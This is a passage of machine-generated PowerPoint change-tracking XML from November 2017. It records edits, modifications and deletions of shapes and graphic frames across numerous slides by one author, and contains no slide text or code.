          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:37:10.988" v="2233" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="285"/>
            <ac:graphicFrameMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-12T00:06:18.095" v="299" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="285"/>
            <ac:graphicFrameMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp del">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:46:00.142" v="3537" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="212467395" sldId="293"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T03:51:31.189" v="595" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="212467395" sldId="293"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T03:51:24.427" v="593" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="212467395" sldId="293"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T17:33:43.112" v="2153" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1135468893" sldId="296"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-12T00:09:03.062" v="327" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="321167381" sldId="301"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-12T00:09:03.062" v="327" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="321167381" sldId="301"/>
            <ac:graphicFrameMk id="69" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:12:33.903" v="2954" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3544603407" sldId="303"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:12:33.903" v="2954" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3544603407" sldId="303"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:55:49.921" v="2923"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3544603407" sldId="303"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T04:23:35.515" v="891" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3544603407" sldId="303"/>
            <ac:spMk id="137" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:05:08.025" v="2935"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3544603407" sldId="303"/>
            <ac:graphicFrameMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:10:01.308" v="2948" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3458964653" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:54:30.727" v="2900" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3458964653" sldId="304"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:10:01.308" v="2948" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3458964653" sldId="304"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:08:55.972" v="2938" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3458964653" sldId="304"/>
            <ac:graphicFrameMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:58:16.965" v="2925"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="788797001" sldId="306"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:49:49.261" v="2898" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788797001" sldId="306"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:58:16.965" v="2925"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788797001" sldId="306"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:55:16.865" v="2921" actId="313"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788797001" sldId="306"/>
            <ac:graphicFrameMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:06:56.211" v="2936"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="370214010" sldId="307"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-11T23:44:44.183" v="159" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370214010" sldId="307"/>
            <ac:spMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-11T23:26:12.716" v="0" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370214010" sldId="307"/>
            <ac:spMk id="11" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-11T23:50:59.945" v="279" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370214010" sldId="307"/>
            <ac:spMk id="107" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:54:39.230" v="2902" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370214010" sldId="307"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:31:29.114" v="2160" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370214010" sldId="307"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:29:29.372" v="2157" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370214010" sldId="307"/>
            <ac:spMk id="137" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:06:56.211" v="2936"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370214010" sldId="307"/>
            <ac:graphicFrameMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:02:48.212" v="2932" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1310475506" sldId="308"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:02:48.212" v="2932" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1310475506" sldId="308"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:04:06.446" v="2934" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2630728331" sldId="309"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:54:55.438" v="2908" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2630728331" sldId="309"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:54:56.773" v="2909" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2630728331" sldId="309"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T04:28:10.672" v="1210" actId="14734"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2630728331" sldId="309"/>
            <ac:spMk id="137" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:04:06.446" v="2934" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2630728331" sldId="309"/>
            <ac:graphicFrameMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:00:28.733" v="2926" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2097789725" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T01:30:57.623" v="351" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:00:28.733" v="2926" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T01:26:03.646" v="329" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="137" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:55:12.972" v="2919" actId="313"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:graphicFrameMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:40:05.505" v="3536" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4197497568" sldId="311"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T03:51:01.373" v="591" actId="790"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4197497568" sldId="311"/>
            <ac:spMk id="26" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T03:51:01.373" v="591" actId="790"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4197497568" sldId="311"/>
            <ac:spMk id="33" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:36:35.433" v="3443" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4197497568" sldId="311"/>
            <ac:spMk id="107" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:36:53.634" v="3446" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4197497568" sldId="311"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:35:07.370" v="3252" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4197497568" sldId="311"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:40:05.505" v="3536" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4197497568" sldId="311"/>
            <ac:spMk id="137" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:55:09.133" v="2917" actId="313"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4197497568" sldId="311"/>
            <ac:graphicFrameMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:54:58.123" v="2910" actId="313"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1911491196" sldId="315"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:50:44.586" v="2716" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911491196" sldId="315"/>
            <ac:spMk id="107" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T04:16:36.197" v="772" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911491196" sldId="315"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T04:18:49.215" v="890" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911491196" sldId="315"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:54:58.123" v="2910" actId="313"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911491196" sldId="315"/>
            <ac:graphicFrameMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:22:04.676" v="3076" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="872923206" sldId="318"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:22:04.676" v="3076" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="872923206" sldId="318"/>
            <ac:graphicFrameMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:39:54.775" v="2242" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1698158142" sldId="320"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-12T00:02:42.505" v="280" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-12T00:03:30.864" v="293" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:39:54.775" v="2242" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:graphicFrameMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:12:25.871" v="2951" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="705852985" sldId="321"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:11:06.804" v="2950" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="705852985" sldId="321"/>
            <ac:spMk id="31" creationId="{9D11D811-BC41-418D-90D1-CD609B0626DA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:12:25.871" v="2951" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="705852985" sldId="321"/>
            <ac:spMk id="39" creationId="{AA4B2B9D-42EE-48ED-AED4-5EA8E4B64D6B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:55:37.049" v="2143" actId="108"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1107843752" sldId="322"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:54:46.649" v="2142" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
